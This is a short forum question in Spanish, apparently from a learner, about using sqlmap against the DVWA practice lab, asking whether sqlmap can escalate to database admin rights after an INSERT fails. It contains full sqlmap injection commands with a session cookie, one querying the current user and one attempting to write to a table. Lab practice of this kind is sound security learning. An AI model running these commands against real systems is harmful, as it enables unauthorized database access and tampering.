¿Cómo hacer que sqlmap obtenga los derechos de administrador para la base de datos?
Estoy usando sqlmap para explotar bases de datos en un proyecto DVWA.
Sin embargo, después de haber explotado la base de datos, ejecuté el siguiente comando para saber que el usuario es dvwa @%:
sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --current-user
Estoy intentando INSERT
algo en las tablas, con estos comandos:
sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --sql-query="INSERT INTO guestbook (comment,name) VALUES ('foo','bar');"
Sin embargo, esto falla, aunque una declaración SELECT
funciona bien.
Supongo que el usuario dvwa @% no tiene privilegios para INSERT/UPDATE
.
¿Es posible que sqlmap obtenga automáticamente privilegios de administrador para la base de datos (en este caso, DVWA)?